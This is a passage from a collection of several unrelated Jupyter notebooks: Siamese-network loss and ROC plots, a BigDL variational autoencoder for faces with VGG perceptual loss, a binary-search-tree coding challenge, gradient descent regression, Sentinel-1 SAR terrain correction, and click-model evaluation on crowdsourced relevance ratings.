0.3643, 0.3952, 0.3679, 0.3782, 0.3793, 0.3819, 0.3788, 0.3839, 0.3762, 0.3602, 0.3768, 0.3655, 0.3888, 0.3725, 0.3600, 0.3761, 0.3735, 0.3601, 0.3891, 0.3680, 0.3732, 0.3720, 0.3826, 0.3788, 0.3883, 0.3722, 0.3669, 0.3741, 0.3816, 0.3611, 0.3875,] loss_val = [0.6709, 0.6218, 0.5453, 0.5184, 0.4754, 0.4872, 0.4495, 0.4419, 0.4154, 0.4232, 0.4144, 0.3770, 0.3981, 0.4024, 0.4159, 0.3808, 0.3764, 0.3764, 0.3724, 0.3980, 0.3866, 0.3599, 0.3640, 0.3640, 0.3868, 0.3955, 0.4026, 0.3515, 0.3702, 0.3685, 0.3582, 0.3502, 0.3768, 0.3673, 0.3775, 0.4151, 0.3834, 0.3653, 0.3944, 0.3809, 0.3836, 0.3806, 0.3992, 0.3585, 0.3917, 0.4079, 0.3658, 0.4287, 0.3915, 0.4031, 0.3929, 0.3585, 0.3454, 0.3649, 0.3966, 0.3683, 0.4039, 0.4115, 0.3630, 0.3824, 0.3943, 0.4042, 0.4022, 0.4036, 0.3766, 0.4097, 0.3498, 0.3530, 0.3660, 0.4135, 0.3876, 0.3353, 0.4189, 0.3772, 0.4196, 0.3968, 0.3739, 0.3972, 0.3880, 0.4015, 0.4123, 0.3755, 0.3893, 0.3839, 0.3943, 0.4226, 0.3586, 0.4082, 0.3896, 0.3598, 0.3765, 0.3780, 0.3899, 0.3835, 0.3658, 0.4031, 0.4266, 0.4078, 0.3769, 0.3637,] # from FCNet_001.txt %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [6,6] plt.rcParams["figure.figsize"] = fig_size plt.plot(range(1, len(loss_train)+1), loss_train, 'b-', label="Train Loss") plt.plot(range(1, len(loss_val)+1), loss_val, 'r:', label="Test Loss") plt.legend(loc='upper right') plt.xlabel('Epoch') plt.ylabel('Loss') # plt.axis('equal') plt.title('Semi-Siamese Network') # axes = plt.gca() # axes.set_xlim([-0.01, 1.01]) # axes.set_ylim([-0.01, 1.01]) plt.show() ``` ## Draw ROC for On-board and On-ground models ``` # siamese resnet, on ground x1, y1 = [0.,0.,0.,0.01052632, 0.01052632, 0.02105263, 0.02105263, 0.06315789, 0.06315789, 0.16842105, 0.16842105, 0.18947368, 0.18947368, 0.30526316, 0.30526316, 1. ] ,[0., 0.01298701, 0.88311688, 0.88311688, 0.8961039, 0.8961039, 0.92207792, 0.92207792, 0.94805195, 0.94805195, 0.97402597, 0.97402597, 0.98701299, 0.98701299, 1. , 1. ] # siamese squeezenet, on board x2, y2 = [0.,0.,0.,0.0106383,0.0106383,0.03191489,0.03191489, 0.04255319 ,0.04255319 ,0.05319149 ,0.05319149 ,0.06382979 ,0.06382979, 0.08510638, 0.08510638, 0.11702128 ,0.11702128 ,0.12765957 ,0.12765957, 0.13829787, 0.13829787, 0.17021277 ,0.17021277 ,0.18085106, 0.18085106, 0.21276596, 0.21276596, 0.22340426 ,0.22340426 ,0.40425532, 0.40425532, 1. ] ,[0. , 0.01282051, 0.70512821 ,0.70512821, 0.74358974, 0.74358974, 0.75641026, 0.75641026, 0.76923077, 0.76923077 ,0.80769231 ,0.80769231, 0.87179487, 0.87179487, 0.8974359 , 0.8974359 ,0.91025641 ,0.91025641, 0.92307692, 0.92307692, 0.93589744, 0.93589744 ,0.94871795 ,0.94871795, 0.96153846, 0.96153846, 0.97435897, 0.97435897 ,0.98717949 ,0.98717949, 1. , 1. ] %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [10,10] plt.rcParams["figure.figsize"] = fig_size plt.axis('equal') plt.plot(x1, y1, 'b-', label="On-ground Model, AUC=0.987") plt.plot(x2, y2, 'y--', label="On-board Model, AUC=0.970") plt.legend(loc='lower right', prop={'size': 20}) plt.xlabel('FPR', fontdict={'fontsize':20}) plt.ylabel('TPR', fontdict={'fontsize':20}) plt.axis('equal') # plt.title('Result on '+phase+' Data') axes = plt.gca() axes.set_xlim([-0.01, 1.01]) axes.set_ylim([-0.01, 1.01]) plt.show() ``` ## Draw training loss for on-ground/on-board models ``` loss_ground = [4.2417, 4.1063, 4.0400, 4.0115, 4.0249, 3.9450, 4.0022, 3.9794, 3.9495, 3.9615, 3.8977, 3.8863, 3.8862, 3.8650, 3.8559, 3.8529, 3.8600, 3.8495, 3.8245, 3.8327, 3.8759, 3.8169, 3.8216, 3.8500, 3.8654, 3.8272, 3.8393, 3.8720, 3.7822, 3.8778, 3.8765, 3.8033, 3.8492, 3.8141, 3.8271, 3.8067, 3.8832, 3.8381, 3.8602, 3.8415, 3.8391, 3.8510, 3.7991, 3.8190, 3.8277, 3.8344, 3.8308, 3.8442, 3.8662, 3.8491,] loss_board = [4.4380 ,4.1775 ,4.0974 ,4.0635 ,4.0453 ,4.0572 ,4.0403 ,4.0316 ,4.0691 ,4.0024 ,4.0088 ,3.9564 ,3.9899 ,3.9672 ,3.9735 ,3.9503 ,3.9473 ,3.9667 ,3.9400 ,3.9579 ,3.9066 ,3.9184 ,3.8994 ,3.8897 ,3.9148 ,3.9462 ,3.9335 ,3.9409 ,3.9513 ,3.9596 ,3.9375 ,3.9072 ,3.9317 ,3.9406 ,3.9140 ,3.9235 ,3.9305 ,3.9356 ,3.9266 ,3.9162 ,3.9122 ,3.8943 ,3.8906 ,3.9546 ,3.9209 ,3.9399 ,3.9192 ,3.8956 ,3.9322 ,3.9269] %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [10,10] plt.rcParams["figure.figsize"] = fig_size plt.plot(range(1, len(loss_ground)+1), loss_ground, 'b-', label="On-ground model") plt.plot(range(1, len(loss_board)+1), loss_board, 'r:', label="On-board model") plt.legend(loc='upper right') plt.xlabel('Epoch') plt.ylabel('Loss') # plt.axis('equal') # plt.title('Training Loss') # axes = plt.gca() # axes.set_xlim([-0.01, 1.01]) # axes.set_ylim([-0.01, 1.01]) plt.show() ```
github_jupyter
# Using Variational Autoencoder and Deep Feature Loss to Generate Faces From the "Using Variational Autoencoder to Generate Faces" example, we see that using VAE, we can generate realistic human faces, but the generated image is a little blury. Though, you can continue to tuning the hyper paramters or using more data to get a better result, in this example, we adopted the approach in [this paper](https://arxiv.org/abs/1610.00291). That is, instead of using pixel-by-pixel loss of between the original images and the generated images, we use the feature map generated by a pre-trained CNN network to define a feature perceptual loss. As you will see, the generated images will become more vivid. ``` from bigdl.nn.layer import * from bigdl.nn.criterion import * from bigdl.optim.optimizer import * from bigdl.dataset import mnist import datetime as dt from bigdl.util.common import * from glob import glob import os import scipy.misc import numpy as np from utils import * image_size = 148 Z_DIM = 100 ENCODER_FILTER_NUM = 32 # we use the vgg16 model, it should work on other popular CNN models # You can download them here (https://github.com/intel-analytics/analytics-zoo/tree/master/models # download the data CelebA, and may repalce with your own data path DATA_PATH = os.getenv("ANALYTICS_ZOO_HOME") + "/apps/variational-autoencoder/img_align_celeba" VGG_PATH = os.getenv("ANALYTICS_ZOO_HOME")+"/apps/variational-autoencoder/analytics-zoo_vgg-16_imagenet_0.1.0.model" init_engine() ``` ## Define the Model We are uing the same model as "Using Variational Autoencoder to Generate Faces" example. ``` def conv_bn_lrelu(in_channels, out_channles, kw=4, kh=4, sw=2, sh=2, pw=-1, ph=-1): model = Sequential() model.add(SpatialConvolution(in_channels, out_channles, kw, kh, sw, sh, pw, ph)) model.add(SpatialBatchNormalization(out_channles)) model.add(LeakyReLU(0.2)) return model def upsample_conv_bn_lrelu(in_channels, out_channles, out_width, out_height, kw=3, kh=3, sw=1, sh=1, pw=-1, ph=-1): model = Sequential() model.add(ResizeBilinear(out_width, out_height)) model.add(SpatialConvolution(in_channels, out_channles, kw, kh, sw, sh, pw, ph)) model.add(SpatialBatchNormalization(out_channles)) model.add(LeakyReLU(0.2)) return model def get_encoder_cnn(): input0 = Input() #CONV conv1 = conv_bn_lrelu(3, ENCODER_FILTER_NUM)(input0) # 32 * 32 * 32 conv2 = conv_bn_lrelu(ENCODER_FILTER_NUM, ENCODER_FILTER_NUM*2)(conv1) # 16 * 16 * 64 conv3 = conv_bn_lrelu(ENCODER_FILTER_NUM*2, ENCODER_FILTER_NUM*4)(conv2) # 8 * 8 * 128 conv4 = conv_bn_lrelu(ENCODER_FILTER_NUM*4, ENCODER_FILTER_NUM*8)(conv3) # 4 * 4 * 256 view = View([4*4*ENCODER_FILTER_NUM*8])(conv4) # fully connected to generate mean and log-variance mean = Linear(4*4*ENCODER_FILTER_NUM*8, Z_DIM)(view) log_variance = Linear(4*4*ENCODER_FILTER_NUM*8, Z_DIM)(view) model = Model([input0], [mean, log_variance]) return model def get_decoder_cnn(): input0 = Input() linear = Linear(Z_DIM, 4*4*ENCODER_FILTER_NUM*8)(input0) reshape = Reshape([ENCODER_FILTER_NUM*8, 4, 4])(linear) bn = SpatialBatchNormalization(ENCODER_FILTER_NUM*8)(reshape) # upsampling up1 = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM*8, ENCODER_FILTER_NUM*4, 8, 8)(bn) # 8 * 8 * 128 up2 = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM*4, ENCODER_FILTER_NUM*2, 16, 16)(up1) # 16 * 16 * 64 up3 = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM*2, ENCODER_FILTER_NUM, 32, 32)(up2) # 32 * 32 * 32 up4 = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM, 3, 64, 64)(up3) # 64 * 64 * 3 output = Tanh()(up4) model = Model([input0], [output]) return model def get_autoencoder_cnn(): input0 = Input() encoder = get_encoder_cnn()(input0) sampler = GaussianSampler()(encoder) decoder_model = get_decoder_cnn() decoder = decoder_model(sampler) model = Model([input0], [encoder, decoder]) return model, decoder_model ``` ## Load the pre-trained CNN model ``` def get_vgg(): # we use the vgg16 model, it should work on other popular CNN models # You can download them here (https://github.com/intel-analytics/analytics-zoo/tree/master/models) vgg_whole = Model.from_jvalue(Model.loadModel(VGG_PATH).value) # we only use one feature map here for the sake of simlicity and efficiency # You can and other feature to the outputs to mix high-level and low-level # feature to get higher quality images outputs = [vgg_whole.node(name) for name in ["relu1_2"]] inputs = [vgg_whole.node(name) for name in ["data"]] outputs[0].remove_next_edges() vgg_light = Model(inputs, outputs).freeze() return vgg_light vgg = get_vgg() model, decoder = get_autoencoder_cnn() ``` ## Load the Datasets ``` def get_data(): data_files = glob(os.path.join(DATA_PATH, "*.jpg")) rdd_train_images = sc.parallelize(data_files[:100000]) \ .map(lambda path: get_image(path, image_size).transpose(2, 0, 1)) rdd_train_sample = rdd_train_images.map(lambda img: Sample.from_ndarray(img, [np.array(0.0), img])) return rdd_train_sample from pyspark import SparkContext sc =SparkContext.getOrCreate() train_data = get_data() ``` ## Define the Training Objective ``` criterion = ParallelCriterion() criterion.add(KLDCriterion(), 0.005) # You may want to twick this parameter criterion.add(TransformerCriterion(MSECriterion(), vgg, vgg), 1.0) ``` ## Define the Optimizer ``` batch_size = 64 # Create an Optimizer optimizer = Optimizer( model=model, training_rdd=train_data, criterion=criterion, optim_method=Adam(0.0005), end_trigger=MaxEpoch(1), batch_size=batch_size) app_name='vae-'+dt.datetime.now().strftime("%Y%m%d-%H%M%S") train_summary = TrainSummary(log_dir='/tmp/vae', app_name=app_name) optimizer.set_train_summary(train_summary) print ("saving logs to ",app_name) ``` ## Spin Up the Training This could take a while. It took about 6 hours on a desktop with a intel i7-6700 cpu and 40GB java heap memory. You can reduce the training time by using less data (some changes in the "Load the Dataset" section), but the performce may not as good. ``` redire_spark_logs() show_bigdl_info_logs() def gen_image_row(): decoder.evaluate() return np.column_stack([decoder.forward(np.random.randn(1, Z_DIM)).reshape(3, 64,64).transpose(1, 2, 0) for s in range(8)]) def gen_image(): return inverse_transform(np.row_stack([gen_image_row() for i in range(8)])) for i in range(1, 6): optimizer.set_end_when(MaxEpoch(i)) trained_model = optimizer.optimize() image = gen_image() if not os.path.exists("./images"): os.makedirs("./images") if not os.path.exists("./models"): os.makedirs("./models") # you may change the following directory accordingly and make sure the directory # you are writing to exists scipy.misc.imsave("./images/image_vgg_%s.png" % i , image) decoder.saveModel("./models/decoder_vgg_%s.model" % i, over_write = True) import matplotlib matplotlib.use('Agg') %pylab inline import numpy as np import datetime as dt import matplotlib.pyplot as plt loss = np.array(train_summary.read_scalar("Loss")) plt.figure(figsize = (12,12)) plt.plot(loss[:,0],loss[:,1],label='loss') plt.xlim(0,loss.shape[0]+10) plt.grid(True) plt.title("loss") ``` ## Random Sample Some Images ``` from matplotlib.pyplot import imshow img = gen_image() imshow(img) ```
github_jupyter
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges). # Challenge Notebook ## Problem: Find the second largest node in a binary search tree. * [Constraints](#Constraints) * [Test Cases](#Test-Cases) * [Algorithm](#Algorithm) * [Code](#Code) * [Unit Test](#Unit-Test) * [Solution Notebook](#Solution-Notebook) ## Constraints * If this is called on a None input or a single node, should we raise an exception? * Yes * None -> TypeError * Single node -> ValueError * Can we assume we already have a Node class with an insert method? * Yes * Can we assume this fits memory? * Yes ## Test Cases * None or single node -> Exception <pre> Input: _10_ _/ \_ 5 15 / \ / \ 3 8 12 20 / \ \ 2 4 30 Output: 20 Input: 10 / 5 / \ 3 7 Output: 7 </pre> ## Algorithm Refer to the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/graphs_trees/check_balance/check_balance_solution.ipynb). If you are stuck and need a hint, the solution notebook's algorithm discussion might be a good place to start. ## Code ``` %run ../bst/bst.py %load ../bst/bst.py class Solution(Bst): def find_second_largest(self): # TODO: Implement me pass ``` ## Unit Test **The following unit test is expected to fail until you solve the challenge.** ``` # %load test_bst_second_largest.py from nose.tools import assert_equal, assert_raises class TestBstSecondLargest(object): def test_bst_second_largest(self): bst = Solution(None) assert_raises(TypeError, bst.find_second_largest) root = Node(10) bst = Solution(root) node5 = bst.insert(5) node15 = bst.insert(15) node3 = bst.insert(3) node8 = bst.insert(8) node12 = bst.insert(12) node20 = bst.insert(20) node2 = bst.insert(2) node4 = bst.insert(4) node30 = bst.insert(30) assert_equal(bst.find_second_largest(), node20) root = Node(10) bst = Solution(root) node5 = bst.insert(5) node3 = bst.insert(3) node7 = bst.insert(7) assert_equal(bst.find_second_largest(), node7) print('Success: test_bst_second_largest') def main(): test = TestBstSecondLargest() test.test_bst_second_largest() if __name__ == '__main__': main() ``` ## Solution Notebook Review the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/graphs_trees/check_balance/check_balance_solution.ipynb) for a discussion on algorithms and code solutions.
github_jupyter
``` import numpy as np from mpl_toolkits.mplot3d import Axes3D from numpy import linalg as la from matplotlib import pyplot as plot ``` ## Reading the data First we load the data from the npz file ``` data = np.load('data/data.npz') x1 = data['x1'] x2 = data['x2'] y = data['y'] ``` ## Generating model Then we use the same model as mentioned in the homework ``` f0 = np.ones(len(x1)) f1 = x1 f2 = np.multiply(x2, x2) # x2^2 f3 = np.multiply(x1, f2) # x1 * x2^2 X = np.column_stack((f0, f1, f2, f3)) # 1, x1, x2^2, x1 * x2^2 y = np.transpose([y]) ``` ## Learning model parameters We use two method to learn the paramters: - Gradient Descent - Stochastic Gradient Descent As shown below, the Gradient Descent algorithm has a better result, but the overall performance of both algorithms are acceptably good. ``` beta_gd = [[1], [3], [2], [4]] step = 0.0001 for i in range(10000): derivation = np.matmul(np.matmul(np.transpose(X), X), beta_gd) - np.matmul(np.transpose(X), y) beta_gd = np.subtract(beta_gd, np.multiply(step, np.multiply(1 / la.norm(derivation, 2), derivation))) print('Beta from gradient descent is: ', beta_gd) print('Beta error on train data: ', np.linalg.norm(np.matmul(X, beta_gd) - y)) alpha = 0.01 beta_sgd = np.ones(shape=(4, 1)) X_temp = np.zeros(shape=(1, 4)) X_temp_T = np.zeros(shape=(4, 1)) Y_temp = np.zeros(shape=(1, 1)) for i in range(10000): myRand = np.random.randint(0, 8000, size=1) X_temp[0] = X[myRand[0]] Y_temp[0] = y[myRand[0]] X_temp_T = np.transpose(X_temp) Grad = np.matmul(np.matmul(X_temp_T, X_temp), beta_sgd) - np.matmul(X_temp_T, Y_temp) Grad = Grad / np.linalg.norm(Grad) beta_sgd = np.add(beta_sgd, np.multiply(-alpha, Grad)) print('Beta from stochastic gradient descent is: ', beta_sgd) print('Beta error on train data: ', np.linalg.norm(np.matmul(X, beta_sgd) - y)) ``` ## Testing the model and its parameters on the test data First we read the test data from the npz file. ``` x1_t = data['x1_test'] x2_t = data['x2_test'] y_t = data['y_test'] ``` ## Generating test model Then we generate the test model, the same model as used in the training phase. ``` f0_t = np.ones(len(x1_t)) f1_t = x1_t f2_t = np.multiply(x2_t, x2_t) f3_t = np.multiply(x1_t, f2_t) X_t = np.column_stack((f0_t, f1_t, f2_t, f3_t)) y_t = np.transpose([y_t]) ``` ## Testing the learnt model paramters Then we use the SSE metric for measuring our learnt parameters' performance. As seen below, we plot the differences between the model predictions and the actual values in different colors on a 3D figure. The first figure and SSE corresponds to the parameters learnt with the gradient descent algorithm and the second one corresponds to the stochastic gradient descent algoirthm. ``` test_error = np.subtract(y_t, np.matmul(X_t, beta_gd)) print("SSE for gradient descent:", la.norm(test_error, 2)) fig = plot.figure() ax = fig.add_subplot(111, projection='3d') xs = x1_t ys = x2_t ax.scatter(xs, ys, np.matmul(X_t, beta_gd), c='b', marker='*') ax.scatter(xs, ys, y_t, c='r', marker='.') plot.show() test_error = np.subtract(y_t, np.matmul(X_t, beta_sgd)) print("SSE for stochastic gradient descent:", la.norm(test_error, 2)) fig = plot.figure() ax = fig.add_subplot(111, projection='3d') xs = x1_t ys = x2_t ax.scatter(xs, ys, np.matmul(X_t, beta_sgd), c='b', marker='*') ax.scatter(xs, ys, y_t, c='r', marker='.') plot.show() ```
github_jupyter
``` %load_ext autoreload %autoreload 2 %matplotlib inline %config InlineBackend.figure_format = 'retina' import matplotlib.pyplot as plt plt.rcParams["figure.figsize"] = (10, 7) plt.rcParams["font.size"] = 12 import inspect import numpy as np import xarray as xr import xarray_sentinel from sarsen import apps, geocoding, orbit, scene # uncomment to check that the code below is in sync with the implementation # print(inspect.getsource(apps.terrain_correction)) ``` # define input and load data ``` product_urlpath = ( "data/S1B_S6_GRDH_1SDV_20211216T115438_20211216T115501_030050_03968A_0F8A.SAFE/" ) measurement_group = "S6/VV" dem_urlpath = "data/Chicago-10m-DEM.tif" orbit_group = None calibration_group = None output_urlpath = "Chicago-10m-GTC-GRD.tif" interp_method = "nearest" multilook = None grouping_area_factor = (1.0, 1.0) open_dem_raster_kwargs = {"chunks": {}} kwargs = {"chunks": 2048} !ls -d {product_urlpath} !ls -d {dem_urlpath} orbit_group = orbit_group or f"{measurement_group}/orbit" calibration_group = calibration_group or f"{measurement_group}/calibration" measurement_ds = xr.open_dataset(product_urlpath, engine="sentinel-1", group=measurement_group, **kwargs) # type: ignore measurement = measurement_ds.measurement dem_raster = scene.open_dem_raster(dem_urlpath, **open_dem_raster_kwargs) orbit_ecef = xr.open_dataset(product_urlpath, engine="sentinel-1", group=orbit_group, **kwargs) # type: ignore position_ecef = orbit_ecef.position calibration = xr.open_dataset(product_urlpath, engine="sentinel-1", group=calibration_group, **kwargs) # type: ignore beta_nought_lut = calibration.betaNought ``` # scene ``` dem_raster _ = dem_raster.plot() %%time dem_ecef = scene.convert_to_dem_ecef(dem_raster) dem_ecef ``` # acquisition ``` measurement %%time acquisition = apps.simulate_acquisition(position_ecef, dem_ecef) acquisition %%time beta_nought = xarray_sentinel.calibrate_intensity(measurement, beta_nought_lut) beta_nought %%time coordinate_conversion = None if measurement_ds.attrs["sar:product_type"] == "GRD": coordinate_conversion = xr.open_dataset( product_urlpath, engine="sentinel-1", group=f"{measurement_group}/coordinate_conversion", **kwargs, ) # type: ignore ground_range = xarray_sentinel.slant_range_time_to_ground_range( acquisition.azimuth_time, acquisition.slant_range_time, coordinate_conversion, ) interp_kwargs = {"ground_range": ground_range} elif measurement_ds.attrs["sar:product_type"] == "SLC": interp_kwargs = {"slant_range_time": acquisition.slant_range_time} if measurement_ds.attrs["sar:instrument_mode"] == "IW": beta_nought = xarray_sentinel.mosaic_slc_iw(beta_nought) else: raise ValueError( f"unsupported sar:product_type {measurement_ds.attrs['sar:product_type']}" ) %%time geocoded = apps.interpolate_measurement( beta_nought, multilook=multilook, azimuth_time=acquisition.azimuth_time, interp_method=interp_method, **interp_kwargs, ) geocoded geocoded.rio.set_crs(dem_raster.rio.crs) geocoded.rio.to_raster( output_urlpath, dtype=np.float32, tiled=True, blockxsize=512, blockysize=512, compress="ZSTD", num_threads="ALL_CPUS", ) _ = geocoded.plot(vmax=1.0) ```
github_jupyter
``` # Copyright 2016 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ################################################################################ # # Notebook to process the ratings and produce plots and tables. %matplotlib notebook %load_ext autoreload %autoreload 2 from __future__ import division import collections import csv import itertools import jsonpickle import math import numpy as np import multiprocessing import os import pandas as pd import pickle import scipy import seaborn as sns import sys import sklearn.cross_validation sys.path.append( os.path.abspath(os.path.join(os.path.dirname('__file__'), os.path.pardir))) import logs_processing.click_model as click_model from logs_processing.create_tasks import Action, LogItem current_palette = sns.color_palette() sns.palplot(current_palette) CF = '<DIRECTORY_WITH_THE_ANONYMIZED_DATASET>' SPAMMER_FILENAME = 'spammers_anonymized.txt' RESULTS_D = 'results_D_anonymized.csv' RESULTS_R = 'results_R_anonymized.csv' TASK_FILE = 'serps_anonymized.csv' USE_CF_TRUST = True ``` ## Read the data ### Read spammers data ``` spammers = set() with open(os.path.join(CF, SPAMMER_FILENAME)) as f: for worker_id in f: spammers.add(worker_id.rstrip()) print '%d spammers' % len(spammers) ``` ### Read ratings ``` log_id_to_rel = collections.defaultdict(click_model.RelContainer) log_id_to_query = {} good_worker_ratings = 0 total_ratings = 0 all_workers = set() with open(os.path.join(CF, RESULTS_D)) as results_D: for row in csv.DictReader(results_D): worker_id = row['cas_worker_id'] all_workers.add(worker_id) total_ratings += 1 if worker_id not in spammers: good_worker_ratings += 1 trust = float(row['cf_worker_trust']) if USE_CF_TRUST else 1 log_id = row['cas_log_id'] click_model.RelContainer.add_rel(log_id_to_rel[log_id].Ds, row['D'], trust) log_id_to_query[log_id] = row['cas_query_id'] print '(D) %.1f%% ratings form spammers' % (100 - 100 * good_worker_ratings / total_ratings) good_worker_ratings = 0 total_ratings = 0 yes_detailed = [] with open(os.path.join(CF, RESULTS_R)) as results_R: for row in csv.DictReader(results_R): worker_id = row['cas_worker_id'] all_workers.add(worker_id) total_ratings += 1 if worker_id not in spammers: good_worker_ratings +=1 trust = float(row['cf_worker_trust']) if USE_CF_TRUST else 1 log_id = row['cas_log_id'] click_model.RelContainer.add_rel(log_id_to_rel[log_id].Rs, row['R'], trust) query = row['cas_query_id'] if row['yes_detailed']: yes_detailed.append(row['yes_detailed']) old_query = log_id_to_query.setdefault(log_id, query) if old_query != query: print >>sys.stderr, ('The same log_id ' '(%s) maps to two different queries: [%s] and [%s]' % ( log_id, old_query, query)) sys.exit(1) print '%d items with complete relevance' % sum( 1 for r in log_id_to_rel.itervalues() if r) print '%d queries with at least one completely judged document' % len(set( log_id_to_query[k] for k, r in log_id_to_rel.iteritems() if r)) print '%d workers in total' % len(all_workers) print '(R) %.1f%% ratings form spammers' % (100 - 100 * good_worker_ratings / total_ratings) def percentages(counter): s = sum(counter.values()) return ['%s: %.1f%%' % (k, v / s * 100) for k, v in counter.most_common()] print percentages(collections.Counter(yes_detailed)) Ds = collections.Counter(x[0] for rel in log_id_to_rel.itervalues() for x in rel.Ds) Rs = collections.Counter(x[0] for rel in log_id_to_rel.itervalues() for x in rel.Rs) print percentages(Ds) print percentages(Rs) ``` ### Correlation between R and D ``` most_common_rel_labels = [] for rel in log_id_to_rel.itervalues(): most_common_rel_labels.append({'D': click_model.rel_most_common(rel.Ds), 'R': click_model.rel_most_common(rel.Rs)}) mc_rels = pd.DataFrame(most_common_rel_labels) scipy.stats.pearsonr(mc_rels['R'], mc_rels['D']) scipy.stats.spearmanr(mc_rels['R'], mc_rels['D']) ax = sns.regplot(x='R', y='D', data=mc_rels, x_jitter=.1, y_jitter=.1) ax.figure.savefig('R_D_correlation.pdf') ``` ### Read SERPs and logs ``` data = [] with open(os.path.join(CF, TASK_FILE)) as task_file: sat_labels = [] num_skipped = 0 num_sat_true = 0 num_total = 0 reader = csv.DictReader(task_file) for key, query_rows_iter in itertools.groupby(reader, key=lambda row: (row['cas_log_id'].split('_')[:-1], # SERP id row['cas_query_id'], row['sat_feedback'])): sat = key[2] if sat == 'undefined': print >>sys.stderr, 'Undefined sat label for query [%s]' % key[1] sat_labels.append(sat) sat = click_model.parse_sat(sat) if sat is None: num_skipped += 1 continue elif sat: num_sat_true += 1 data_row = {'query': key[1], 'sat': sat, 'session': [], 'serp': []} for row in query_rows_iter: data_row['session'].append(jsonpickle.decode(row['actions'])) data_row['serp'].append(click_model.Snippet(emup=row['emup'], cas_item_type=row['cas_item_type'], is_complex=row['is_complex'])) data.append(data_row) num_total += 1 print collections.Counter(sat_labels) print 'Skipped %d rows out of %d' % (num_skipped, num_total + num_skipped) print '%.1f%% of SAT labels in the data' % (num_sat_true / num_total * 100) print '%d queries left' % len(data) print '%d SERP items w/ ratings' % sum(sum(1 for l in row['session'] if log_id_to_rel[l.log_id]) for row in data) ``` ## Do the heavy lifting ``` MODELS = { 'CAS': click_model.CAS(log_id_to_rel), 'CASnod': click_model.CAS(log_id_to_rel, use_D=False), 'CASnosat': click_model.CAS(log_id_to_rel, sat_term_weight=0), 'CASnoreg': click_model.CAS(log_id_to_rel, reg_coeff=0), 'random': click_model.RandomSatModel(), 'PBM': click_model.PyClickModel('PBM', log_id_to_rel), 'UBM': click_model.PyClickModel('UBM', log_id_to_rel), 'DCG': click_model.DCG(log_id_to_rel), 'uUBM': click_model.uUBM(log_id_to_rel), } def compute_performance(index, train_data, test_data, result_queue): result = {} for name, model in MODELS.iteritems(): try: params = model.train(train_data) ll_values_test = [ model.log_likelihood(params, d['session'], d['serp'], d['sat'], f_only=True ) for d in test_data ] result[name] = {} result[name]['full'] = np.average([l.full for l in ll_values_test]) result[name]['click'] = np.average([l.clicks for l in ll_values_test]) result[name]['sat'] = np.average([l.sat for l in ll_values_test]) result[name]['utility'] = [model.utility(params, d['session'], d['serp']) for d in test_data] result[name]['sat pearson'] = scipy.stats.pearsonr( [int(d['sat']) for d in test_data], result[name]['utility'] )[0] except Exception, e: result[name] = sys.exc_info() result_queue.put((index, result)) N_REPETITIONS = 1 N_FOLDS = 3 N = len(data) data = np.array(data) result_queue = multiprocessing.Queue() workers = [] for rep_index in xrange(N_REPETITIONS): for fold_num, (train_index, test_index) in enumerate(sklearn.cross_validation.KFold(N, n_folds=N_FOLDS, shuffle=True, random_state=rep_index)): w = multiprocessing.Process(target=compute_performance, args=((rep_index, fold_num), data[train_index], data[test_index], result_queue)) workers.append(w) w.start() results = [] for i in xrange(len(workers)): try: results.append(result_queue.get(timeout=300)) print >>sys.stderr, i, except multiprocessing.TimeoutError: print >>sys.stderr, '..', print len(results) for w in workers: w.join() ``` ### Save the results ``` def flatten(results): out = [] for idx, result in results: for model, r in result.iteritems(): if isinstance(r, tuple): print >>sys.stderr, r else: out += [{'rep': idx[0], 'fold': idx[1], 'model': model, 'metric': k, 'value': v} for (k, v) in r.iteritems()] return out d = pd.DataFrame(flatten(results)) d.to_pickle('results.df') ``` ## Metric-metric correlation ``` def utility(rep, fold, model): return d[d['rep'] == rep][d['fold'] == fold][d['model'] == model][d['metric'] == 'utility'].iloc[0]['value'] #utility(0, 0, 'CAS') correlations = {} model_names = ['CASnod', 'CASnosat', 'CASnoreg', 'CAS', 'UBM', 'PBM', 'DCG', 'uUBM'] for i in xrange(len(model_names)): m1 = model_names[i] correlations[m1] = {} for m2 in model_names[:i]: vals = [] for rep in xrange(N_REPETITIONS): for fold in xrange(N_FOLDS): try: m1_utility = utility(rep, fold, m1) m2_utility = utility(rep, fold, m2) vals.append(scipy.stats.pearsonr(m1_utility, m2_utility)[0]) except IndexError as e: print >>sys.stderr, 'Missing value: rep=%d, fold=%d, m1=%s, m2=%s' % (rep, fold, m1, m2) continue correlations[m1][m2] = np.mean(vals) correlations = pd.DataFrame(correlations, index=model_names[:-1], columns=model_names[1:]) print correlations.to_latex(float_format=lambda x: '---' if math.isnan(x) else '%.3f' % x) ``` ### Complex SERPs ``` def is_complex(serp): return any(snippet.is_complex for snippet in serp) def apply_mask(iterable, mask, inverted=False): return [x for x, m in zip(iterable, mask) if (m if not inverted else not m)] N_REPETITIONS_COMPLEX = 20 model_names = [ # 'CASnod', 'CASnosat', 'CASnoreg', # 'CAS', # 'UBM', 'PBM', 'random', 'DCG', 'uUBM'] num_complex_serps = {} results = [] data = np.array(data) complex_serps = [is_complex(x['serp']) for x in data] for rep_index, (train_index, test_index) in enumerate(sklearn.cross_validation.StratifiedShuffleSplit( complex_serps, N_REPETITIONS_COMPLEX, test_size=1/24, random_state=0)): num_complex_serps[rep_index] = {} train_data = data[train_index] test_data = data[test_index] complex_serp_mask = [is_complex(x['serp']) for x in test_data] sat_labels = [int(x['sat']) for x in test_data] sat_labels_complex = apply_mask(sat_labels, complex_serp_mask) num_complex_serps[rep_index] = len(sat_labels_complex) for m in 